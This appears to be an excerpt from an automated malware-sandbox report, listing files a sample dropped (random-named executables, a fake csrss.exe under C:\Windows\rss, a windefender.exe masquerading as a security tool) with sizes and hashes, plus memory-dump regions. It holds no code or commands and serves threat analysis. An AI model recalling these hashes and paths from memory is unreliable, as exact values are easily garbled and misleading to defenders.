bc9a458af90f4da7a5394182dfa15b63c0f621bbb203c1016c984c14a0660d63d34346498a9bf1cfcee5ae550d14220445eca0867741c9a3eb9c785067663bfe

Download Submit
C:\Users\Admin\Pictures\M2dAoNIJauDjFDEiEnkkZWdz.exe

Filesize
87KB

MD5
c9f72400f6fd7fe0484b280bde6d9286

SHA1
2c822ebb08fb1d5e0e6f6f42dc13f4da53a9a7c6

SHA256
22a8977f361a328c578f5c4b22a70aaed94d7d4d3a6b4b87d67b3589edbbced0

SHA512
632e7b4281677db61d2e0fcfc452b71854bd45b59f4af64b8fac38eafe8240a65fcc4efcda28721a9f8a7bc8a71f25dfd857ab18b45ce789da23d3ee74bdf0ee

Download Submit
C:\Users\Admin\Pictures\b06hyNi6l8z3JwyMTKd2aUSe.exe

Filesize
119KB

MD5
3d642961c1cc69800252062f420f7e30

SHA1
b95e9748ad548e59b2745880960448400386013e

SHA256
176877ae8d829a6862189ab78d871714aceeee1732f6109540fb5a4fd9a12968

SHA512
d90506beaa1b9ba6d19674a3d3e67d9075c2dd4ed06ba8ab7c2cb8331b5b3b95720a5d34d72d2c35a2e5d9d026409e3356348b78ba64c9f0d25d4b8bd94f74bf

Download Submit
C:\Users\Admin\Pictures\b06hyNi6l8z3JwyMTKd2aUSe.exe

Filesize
193KB

MD5
c23bebcff6aeaffa9a674714ec82b771

SHA1
294be7a2c0cc2508079df2bbf415addbf01be7ad

SHA256
a0a6d51280c53653b35b58c37455bdfba09cb3dea2b2103a660a0b9a85f19f96

SHA512
005270e49130977cf6586dd25d8afec2f955b2966ef5b7ca2e42a101d75b9fa4f38e5754685a2e4f19b08ddc5899af9cd8f56aeccf701f871e1f48933708ba99

Download Submit
C:\Users\Admin\Pictures\b06hyNi6l8z3JwyMTKd2aUSe.exe

Filesize
71KB

MD5
d9eece0900420643085f8a8cc030d9ad

SHA1
3eb1a9756eaf976b6feb63ffc8b682c24857db99

SHA256
9ee33c440dacf2a1ec5a06ac58bb911e22d3a4b5092a6a830960686ee02a59d9

SHA512
997f6075130192c11fabe7d8fec5e3612dbaf9ff5944ddf4f7afb892c57c72455384000ff59a150cf54bd78bdd546b42f7f0a7bd5936848b1b6d47e4a2a870e6

Download Submit
C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe

Filesize
24KB

MD5
98630a13fedc2730aec2550168ec8f80

SHA1
bf2c3aa03ab16cf2f830a2c85e90c62fd0ec0db8

SHA256
78ca2e78bc3c6bc64a66ee0504291389cbce393cfb0d5af101e9b4d8b7cd0bd8

SHA512
d45e32721a1cae743840a97480299854e4a7557f9ded23bf3e4a8155440e0e5069058f673eec814e8d79159cc8c481ac2263f33f51af65d18540c60dd19ebd6e

Download Submit
C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe

Filesize
41KB

MD5
4404b5aaf2c5d616207e640365ac3948

SHA1
b40508be2ab9240ecac8d7ff825e8562d27dcc44

SHA256
261d216f4e2f165621bf76bcaad0322eb3d0166c149e1a3cb8715bfc995cbbf2

SHA512
5897446bd41574b3eeae334a42355e0adccd67c18a30ae92957b3703b3f78a0287519c1d628680d42150a6f1ea6966e36143cb8aef3d9482f62eae886666c9f3

Download Submit
C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe

Filesize
23KB

MD5
a9c8c1bb390745a454e0605100e6d1ab

SHA1
b0649c677b91edb26ed713a7f7c230ac418cff58

SHA256
83fcb929ad4c2b01268399182c3360ff486bd411b0437ac16d301b405ceebd76

SHA512
0bf272946e17626f0cf3633b531981158f31db525f0676fe068ef90c66a9f9d3d0bd14a8f4bd97893568be56e10809489485914871f7a87403dced4cae869539

Download Submit
C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe

Filesize
1KB

MD5
5c249a021a991f66d98b5b55299f99fa

SHA1
d557fbde1de6971074a2cdabe31085503ceb30ca

SHA256
7c225fad80da89e97be07a894a4d5c3844b54ed3ba99f51d4fb5a22b6d8fbf03

SHA512
19f6e4c35352494838f87f723102cf3ba70bf51af5ab095db0d9ec5e64592b9819152a5d94b01013473766d5c91e307a19cc6cc72e66dd4e38cd0a3f2c5ceda8

Download Submit
C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe

Filesize
31KB

MD5
5b441f5c99c769632564ebb8be699624

SHA1
513985853769d23c9c1ba1de72642a50a242b3f8

SHA256
be591aa25a9137a60f9dbb04f7facf1c87fe983b20edac8ea655b0a7cf661124

SHA512
a8683776efce03f30b2fe4a1f6e4f812994e72b2b5f9ba4be0a90c273eb2b8385dff01398362039e52971a1da64f8f4fe5fed38f1286dcad81df2e4806727dea

Download Submit
C:\Users\Admin\Pictures\oGqYWM9fD7MhJvCRjHuxu0zj.exe

Filesize
72KB

MD5
70deb106cef2ea86fa8e4ba0ecce366e

SHA1
8741165699c17c2af7cfb3a635e59e2196bbc580

SHA256
1a9fc05def20a89093238a325439dfc1c2b92f4fa4f74cb87749d8ebb455c993

SHA512
9a9724792ac0be63029369c7c8b4969f8456a7ced08f04d9c5489cfd711fa5e5053210d812e398b9c23a04dc7c8408e31bbf568042abef149a79f032fe1aead1

Download Submit
C:\Users\Admin\Pictures\rOcFFvjTLrORxv7a9YJZweFQ.exe

Filesize
212B

MD5
963da09532e9758adedf9745c76ec700

SHA1
bc976476358cffdbc3f22b6e491f94ccbf15308d

SHA256
8720b9487cee7dae6db3f8f73273bcbbc56377400b830ca0f089473ebc9603f2

SHA512
2da299bd10de6d425ee84fc2d17f514d003995f489946cdebafa0dcea4058419bcc38beabc2cbbd4546c2117fcf502292b97edffd57da555017762c4f05122f6

Download Submit
C:\Users\Admin\Pictures\y20KvXBQYrJAGqxGVnOVzbLy.exe

Filesize
7KB

MD5
5b423612b36cde7f2745455c5dd82577

SHA1
0187c7c80743b44e9e0c193e993294e3b969cc3d

SHA256
e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09

SHA512
c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
bcec4ce85e35f0f310f10cfe101fe2d4

SHA1
5786e521701ffeebfa2ef8080bb999e25db60e40

SHA256
5b432820cd87de474f3298712674fbd19f0e737364b76180a462dcdafd0e29bd

SHA512
5a2c808430203206839053f6631c55af5cc4483bcdd11bb0825d7a15b2ae1bfbda31c352b2cb0961a9fdb4aeac2cee23cfefaecc85e5238cc35b7154dd47ebb3

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
cb607b3836b13b0efc0d268393d97aea

SHA1
5a7e88084620cf0b2ec50f24580339d02d7562dd

SHA256
37d371eafbe48041574ede0c2a4797b9d875b445d0ecde22178a1be8876f3fd9

SHA512
73aea9a3a6ad2c81ba72c6955a7049252bc22f4bce3c04988f4a4e5aee1728390b047ea307e24a20cb34814a59097991ffda949b2d23ff25642696a87f71227a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
c696243af8abc2cb210e719f219bb2f1

SHA1
f4375c5728f2ed01b14d86211cc200575ff7ef3f

SHA256
2f6d2c99e02f6341809875df9f3ebaf5a42a762f2f356ef6e062c76019ad2225

SHA512
e331063a4949597533deea37897b064179ec5d44737746961ef21138761be064b387f79c832099304c1e2b8bdf4659be32b5222480180ec6c0c5c914ba7a7eee

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
59181beb933a2634ac657202361f096a

SHA1
79fdcfcf38aec8d55a549adeb52acd32779db954

SHA256
37ff5d107fd49283517c4c19feb99c6fdd0752cc1749b9187bb5ad76b09f192b

SHA512
a69182fcd205cbb8f9013337f67c5a8e8214f267755bc2fb339d09868097540c119fefa76afa9334d744c147ab931d6aeed4f62015766668cec4f98f891d61b2

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
43d9088629b77661f4d0c7df2e90cfed

SHA1
44624b91c3b0bd666fcfa3de099764b22ab19b93

SHA256
0ec6a64647db4b07b07eecfbbdc31d388d424a97c38e53ffc35958dcbdc4a01f

SHA512
98de5c7e8e3267e84d73504baaacae509ac5afccd645d9e9e2880f2e5d0c05ffe4f5da1d6536657421c70158ed1d6b151c7ac144e57a126ac46961cbd2182c66

Download Submit
C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\VxHaPwz.exe

Filesize
65KB

MD5
8b7423af097a839f404a80d3d1677f8e

SHA1
c630caf50666f1c78a423b3563c3b21b6bc2e57e

SHA256
c24c82a1f8200e99bf03bf34b9e17a6bb8f4a512c823d31184fc1c75803139b8

SHA512
1fc5bdf92c9c735be15cdcbb3f6af205c999de35df8a49093a718ecb158c4765de5ae232c454ad9350987522ba3b9b37e34f62be9a90b08b7f59abf1d05e65b7

Download Submit
C:\Windows\rss\csrss.exe

Filesize
92KB

MD5
2aaae0c792419014ce07c857f5319a7a

SHA1
fe18cb1135bc7e549d06d0df5cbfaf5576cff335

SHA256
61e2c24dd3bd50c1f7fd6c02c7a364bf9c08162b5e9f49e45723c76cda17d300

SHA512
2e12b181b00f18a695f743bd4e6463c9fe537bd9ea59f7b5cc270db1a04e9ca67394172d0e108b996f266330f2fc2a3922d1b9084435c99e53805b136e604642

Download Submit
C:\Windows\rss\csrss.exe

Filesize
102KB

MD5
43425cb058b2996118ded08c0645b64e

SHA1
0f62abdbc40a428e6800e852991a28d276bc95c6

SHA256
e10920a1833e6e804623217b4fc970d27fc3169bac7f29932434c1714d970b8f

SHA512
7037302f597330a51ef20aab83f1e7aa1db3b0434e2d0e33c6be544fd3f9db5f24930d28e46387ef04043da458c3fcf6a40d7d937b8f31b4dd6de38ed7512aa7

Download Submit
C:\Windows\windefender.exe

Filesize
63KB

MD5
6a3aaed15ae2e1f30b4a95491c37536e

SHA1
74c011c27bb21a049d2a8354387262f45b98f524

SHA256
0ab56d4e83646956060e7dfb44bd70a0f998c059d21b82c2184b093772014274

SHA512
278a309201aa0541b7c1d1735849a65474a314d5555dc9db521ac1ea128a0f77751710ffceacf2b0bcd918432a466f8ef6421819297fd2696c3aa9f5f1f271b4

Download Submit
memory/748-339-0x0000000000400000-0x00000000008E2000-memory.dmp

Filesize
4.9MB

Download
memory/748-118-0x00000000027A0000-0x00000000027A1000-memory.dmp

Filesize
4KB

Download
memory/748-773-0x0000000000400000-0x00000000008E2000-memory.dmp

Filesize
4.9MB

Download
memory/748-260-0x00000000027A0000-0x00000000027A1000-memory.dmp

Filesize
4KB

Download
memory/1492-0-0x000001C6C8F10000-0x000001C6C8F32000-memory.dmp

Filesize
136KB

Download
memory/1492-15-0x00007FFD831E0000-0x00007FFD83CA1000-memory.dmp

Filesize
10.8MB

Download
memory/1492-10-0x00007FFD831E0000-0x00007FFD83CA1000-memory.dmp

Filesize
10.8MB

Download
memory/1492-12-0x000001C6C6470000-0x000001C6C6480000-memory.dmp

Filesize
64KB

Download
memory/1492-11-0x000001C6C6470000-0x000001C6C6480000-memory.dmp

Filesize
64KB

Download
memory/1940-205-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1940-100-0x0000000002EF0000-0x00000000037DB000-memory.dmp

Filesize
8.9MB

Download
memory/1940-108-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1940-174-0x0000000002AE0000-0x0000000002EE6000-memory.dmp

Filesize
4.0MB

Download
memory/1940-67-0x0000000002AE0000-0x0000000002EE6000-memory.dmp

Filesize
4.0MB

Download
memory/1940-853-0x0000000004460000-0x0000000005088000-memory.dmp

Filesize
12.2MB

Download
memory/1940-181-0x0000000002EF0000-0x00000000037DB000-memory.dmp

Filesize
8.9MB

Download
memory/1940-847-0x0000000010000000-0x000000001001B000-memory.dmp

Filesize
108KB

Download
memory/1940-338-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/1984-175-0x0000000000720000-0x0000000000820000-memory.dmp

Filesize
1024KB

Download
memory/1984-328-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/1984-177-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/1984-176-0x00000000006D0000-0x00000000006EC000-memory.dmp

Filesize
112KB

Download
memory/1984-378-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/1984-795-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/1984-811-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/1984-648-0x0000000000400000-0x000000000062E000-memory.dmp

Filesize
2.2MB

Download
memory/2204-809-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2556-242-0x0000000000ED0000-0x00000000013B8000-memory.dmp

Filesize
4.9MB

Download
memory/2556-380-0x0000000000ED0000-0x00000000013B8000-memory.dmp

Filesize
4.9MB

Download
memory/2668-248-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2668-117-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2668-209-0x0000000002A60000-0x0000000002E60000-memory.dmp

Filesize
4.0MB

Download
memory/2668-276-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2668-109-0x0000000002A60000-0x0000000002E60000-memory.dmp

Filesize
4.0MB

Download
memory/2704-129-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/2704-158-0x0000000005EF0000-0x0000000005F0E000-memory.dmp

Filesize
120KB

Download
memory/2704-134-0x0000000004F30000-0x0000000004F52000-memory.dmp

Filesize
136KB

Download
memory/2704-224-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/2704-135-0x00000000050D0000-0x0000000005136000-memory.dmp

Filesize
408KB

Download
memory/2704-155-0x0000000005A30000-0x0000000005D84000-memory.dmp

Filesize
3.3MB

Download
memory/2704-132-0x0000000002A60000-0x0000000002A70000-memory.dmp

Filesize
64KB

Download
memory/2704-211-0x00000000075F0000-0x0000000007601000-memory.dmp

Filesize
68KB

Download
memory/2704-159-0x0000000005F40000-0x0000000005F8C000-memory.dmp

Filesize
304KB

Download
memory/2704-204-0x00000000074E0000-0x0000000007583000-memory.dmp

Filesize
652KB

Download
memory/2704-165-0x0000000007020000-0x0000000007096000-memory.dmp

Filesize
472KB

Download
memory/2704-213-0x0000000007640000-0x0000000007654000-memory.dmp

Filesize
80KB

Download
memory/2704-166-0x00000000070C0000-0x00000000070DA000-memory.dmp

Filesize
104KB

Download
memory/2704-179-0x000000006F550000-0x000000006F59C000-memory.dmp

Filesize
304KB

Download
memory/2704-182-0x000000006ECB0000-0x000000006F004000-memory.dmp

Filesize
3.3MB

Download
memory/2704-212-0x0000000007630000-0x000000000763E000-memory.dmp

Filesize
56KB

Download
memory/2704-194-0x00000000074C0000-0x00000000074DE000-memory.dmp

Filesize
120KB

Download
memory/2704-206-0x0000000002A60000-0x0000000002A70000-memory.dmp

Filesize
64KB

Download
memory/2736-51-0x00007FF77DC80000-0x00007FF77DCE6000-memory.dmp

Filesize
408KB

Download
memory/2816-214-0x00000000074A0000-0x00000000074BA000-memory.dmp

Filesize
104KB

Download
memory/2816-136-0x00000000055F0000-0x0000000005656000-memory.dmp

Filesize
408KB

Download
memory/2816-207-0x00000000046C0000-0x00000000046D0000-memory.dmp

Filesize
64KB

Download
memory/2816-126-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/2816-183-0x000000007F8B0000-0x000000007F8C0000-memory.dmp

Filesize
64KB

Download
memory/2816-210-0x0000000007400000-0x0000000007496000-memory.dmp

Filesize
600KB

Download
memory/2816-208-0x0000000007330000-0x000000000733A000-memory.dmp

Filesize
40KB

Download
memory/2816-180-0x000000006F550000-0x000000006F59C000-memory.dmp

Filesize
304KB

Download
memory/2816-186-0x000000006ECB0000-0x000000006F004000-memory.dmp

Filesize
3.3MB

Download
memory/2816-178-0x00000000071E0000-0x0000000007212000-memory.dmp

Filesize
200KB

Download
memory/2816-225-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/2816-130-0x00000000046C0000-0x00000000046D0000-memory.dmp

Filesize
64KB

Download
memory/2816-123-0x00000000046D0000-0x0000000004706000-memory.dmp

Filesize
216KB

Download
memory/2816-167-0x0000000007720000-0x0000000007D9A000-memory.dmp

Filesize
6.5MB

Download
memory/2816-215-0x00000000073E0000-0x00000000073E8000-memory.dmp

Filesize
32KB

Download
memory/2816-161-0x0000000006020000-0x0000000006064000-memory.dmp

Filesize
272KB

Download
memory/2816-125-0x0000000004D40000-0x0000000005368000-memory.dmp

Filesize
6.2MB

Download
memory/3252-236-0x0000000000ED0000-0x00000000013B8000-memory.dmp

Filesize
4.9MB

Download
memory/3284-382-0x0000000000ED0000-0x00000000013B8000-memory.dmp

Filesize
4.9MB

Download
memory/3700-254-0x00000000002A0000-0x0000000000788000-memory.dmp

Filesize
4.9MB

Download
memory/3700-259-0x00000000002A0000-0x0000000000788000-memory.dmp

Filesize
4.9MB

Download
memory/4700-616-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/4700-262-0x0000000002A00000-0x0000000002DFF000-memory.dmp

Filesize
4.0MB

Download
memory/4700-381-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/4836-124-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/4836-16-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/4836-18-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

Filesize
64KB

Download
memory/4836-133-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

Filesize
64KB

Download
memory/4836-17-0x0000000074F80000-0x0000000075730000-memory.dmp

Filesize
7.7MB

Download
memory/5400-607-0x0000000010000000-0x0000000010574000-memory.dmp

Filesize
5.5MB

Download
memory/5720-823-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5720-774-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5728-851-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/5840-681-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/5840-606-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download